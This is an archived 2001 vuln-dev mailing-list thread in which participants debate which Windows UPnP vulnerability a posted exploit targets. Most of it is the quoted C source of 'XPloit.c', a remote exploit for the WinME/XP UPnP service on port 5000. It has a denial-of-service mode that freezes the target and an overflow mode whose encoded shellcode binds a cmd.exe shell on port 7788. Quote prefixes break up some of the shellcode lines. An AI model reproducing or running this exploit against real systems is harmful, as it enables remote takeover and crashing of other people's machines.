Hello Ryan, Yes, this one is to another hole reported on Bugtraq by milo omega and covered by MS01-54 http://www.security.nnov.ru/search/news.asp?binid=1518 There are another exploits known in-the-wild to this problem. --Tuesday, December 25, 2001, 12:47:24 AM, you wrote to alteregoat_private: RP> iv'e been poking at the exploit, and from what i can see, this is NOT for RP> the eeye advisory, perhaps another bug, but i don't have an xp machine here RP> to do any type of analysis on this, so it is hard t say what it will do. RP> This may even be a similar/same bug however, and somone found a different RP> way of attacking it. port 5000 TCP is also involved in the upnp/SSDP RP> protcol, and is hosted in svchost.exe, so until further analysis is done, RP> little more can be said. RP> Signed, RP> Ryan Permeh RP> eEye Digital Security Team RP> http://www.eEye.com/Retina -Network Security Scanner RP> http://www.eEye.com/Iris -Network Traffic Analyzer RP> http://www.eEye.com/SecureIIS -Stop Known and Unknown IIS Vulnerabilities RP> ----- Original Message ----- RP> From: "Sebastian Wells" <alteregoat_private> RP> To: <vuln-devat_private> RP> Sent: Monday, December 24, 2001 9:45 AM RP> Subject: Re: "Universal Plug and Play technology exploit code" >> Is this an exploit to the most recent UPnP hole that was posted to RP> bugtraq? >> In the discussion of that vulnerability it was stated that UPnP was on UDP >> port 1900. >> >> Am I just confused? >> >> - Sebastian >> ----- Original Message ----- >> From: <KRFinisterreat_private> >> To: <vuln-dev@security-focus.com> >> Sent: Monday, December 24, 2001 10:48 AM >> Subject: "Universal Plug and Play technology exploit code" >> >> >> > This code is NOT by me... I found it on the net today and thought that RP> you >> > guys may enjoy it. I saw no copyrights on this or messages stating NOT RP> to >> > post this code. >> > >> > http://qb0x.net/exploits/XPloit.c >> > >> > /* >> > * WinME/XP UPNP dos & overflow >> > * >> > * Run: ./XPloit host <option> >> > * >> > * Windows run the "Universal Plug and Play technology" service >> > * at port 5000. In the future this will allow for seemless >> > * connectivity of various devices such as a printer. >> > * This service have a DoS and a buffer overflow I exploit here. >> > * >> > * PD: the -e option spawns a cmd.exe shell on port 7788 coded by isno >> > * >> > * Author: Gabriel Maggiotti >> > * Email: gmaggiotat_private >> > * Webpage: http://qb0x.net >> > */ >> > >> > #include <stdio.h> >> > #include <string.h> >> > #include <stdlib.h> >> > #include <errno.h> >> > #include <string.h> >> > #include <netdb.h> >> > #include <sys/types.h> >> > #include <netinet/in.h> >> > #include <sys/socket.h> >> > #include <sys/wait.h> >> > #include <unistd.h> >> > #include <fcntl.h> >> > >> > #define MAX 10000 >> > #define PORT 5000 >> > #define FREEZE 512 >> > #define NOP 0x43 //inc ebx, instead of 0x90 >> > >> > >> RP> /*************************************************************************** >> / >> > >> > >> > int main(int argc,char *argv[]) >> > { >> > int sockfd[MAX]; >> > char sendXP[]="XP"; >> > char jmpcode[281], execode[840],request[2048]; >> > char *send_buffer; >> > int num_socks; >> > int bindport; >> > int i; >> > int port; >> > >> > unsigned char shellcode[] = >> > RP> "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90" >> >> > RP> "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa" >> > RP> "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36" >> > RP> "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97" >> > RP> "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14" >> > RP> "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2" >> > RP> "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14" >> > RP> "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5" >> > RP> "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1" >> > RP> "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16" >> > RP> "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68" >> > RP> "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1" >> > RP> "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94" >> > RP> "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4" >> > RP> "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68" >> > RP> "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57" >> > RP> "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4" >> > RP> "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4" >> > " >> > \x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5" >> > RP> "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68" >> > RP> "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67" >> > RP> "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1" >> > RP> "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf" >> > RP> "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab" >> > RP> "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0" >> > RP> "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4" >> > RP> "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0" >> > RP> "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56" >> > RP> "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7" >> > RP> "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57" >> > RP> "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4" >> > RP> "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f" >> > RP> "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7" >> > RP> "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68" >> > RP> "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f" >> > RP> "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75" >> > RP> "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0" >> > RP> "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5" >> > RP> "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2" >> > RP> "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6" >> > >> > " >> > \x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97" >> > RP> "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc" >> > RP> "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb" >> > RP> "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97" >> > RP> "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2" >> > RP> "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4" >> > RP> "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97" >> > RP> "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2" >> > RP> "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97" >> > RP> "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97" >> > "\x68\x68\x68\x68"; >> > struct hostent *he; >> > struct sockaddr_in their_addr; >> > >> > >> > if(argc!=3) >> > { >> > fprintf(stderr,"usage:%s <hostname> <command> >> > \n",argv[0]); >> > fprintf(stderr,"-f freeze the machine.\n"); >> > fprintf(stderr,"-e exploit.\n"); >> > exit(1); >> > } >> > >> > >> > if(strstr(argv[2],"-f")) { >> > num_socks=FREEZE; >> > send_buffer=sendXP; >> > } >> > >> > if(strstr(argv[2],"-e")) { >> > num_socks=1; >> > send_buffer=request; >> > bindport^=0x9797; >> > shellcode[778]= (bindport) & 0xff; >> > shellcode[779]= (bindport >> 8) & 0xff; >> > >> > for(i = 0; i < 268; i++) >> > jmpcode[i] = (char)NOP; >> > >> > jmpcode[268] = (char)0x4d; >> > jmpcode[269] = (char)0x3f; >> > jmpcode[270] = (char)0xe3; >> > jmpcode[271] = (char)0x77; >> > jmpcode[272] = (char)0x90; >> > jmpcode[273] = (char)0x90; >> > jmpcode[274] = (char)0x90; >> > jmpcode[275] = (char)0x90; >> > >> > //jmp [ebx+0x64], jump to execute shellcode >> > jmpcode[276] = (char)0xff; >> > jmpcode[277] = (char)0x63; >> > jmpcode[278] = (char)0x64; >> > jmpcode[279] = (char)0x90; >> > jmpcode[280] = (char)0x00; >> > >> > for(i = 0; i < 32; i++) >> > execode[i] = (char)NOP; >> > execode[32]=(char)0x00; >> > strcat(execode, shellcode); >> > >> > snprintf(request, 2048, "%s%s\r\n\r\n", jmpcode, RP> execode); >> > } >> > >> > if((he=gethostbyname(argv[1]))==NULL) >> > { >> > perror("gethostbyname"); >> > exit(1); >> > } >> > >> > >> > >> RP> /*************************************************************************** >> / >> > >> > >> > for(i=0; i<num_socks;i++) >> > if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) RP> == -1) >> { >> > perror("socket"); exit(1); >> > } >> > >> > >> > their_addr.sin_family=AF_INET; >> > their_addr.sin_port=htons(PORT); >> > their_addr.sin_addr=*((struct in_addr*)he->h_addr); >> > bzero(&(their_addr.sin_zero),8); >> > >> > >> > >> > for(i=0; i<num_socks;i++) >> > if( connect(sockfd[i],(struct RP> sockaddr*)&their_addr, >> > sizeof(struct sockaddr))==-1) >> > { >> > perror("connect"); >> > exit(1); >> > } >> > >> > >> > for(i=0; i<num_socks;i++) >> > if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1) >> > { >> > perror("send"); >> > exit(0); >> > } >> > >> > >> > for(i=0; i<num_socks;i++) >> > close(sockfd[i]); >> > >> > >> > return 0; >> > } >> > >> > -KF >> > >> > >> >> -- ~/ZARAZA Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский)
This archive was generated by hypermail 2b30 : Wed Dec 26 2001 - 09:37:29 PST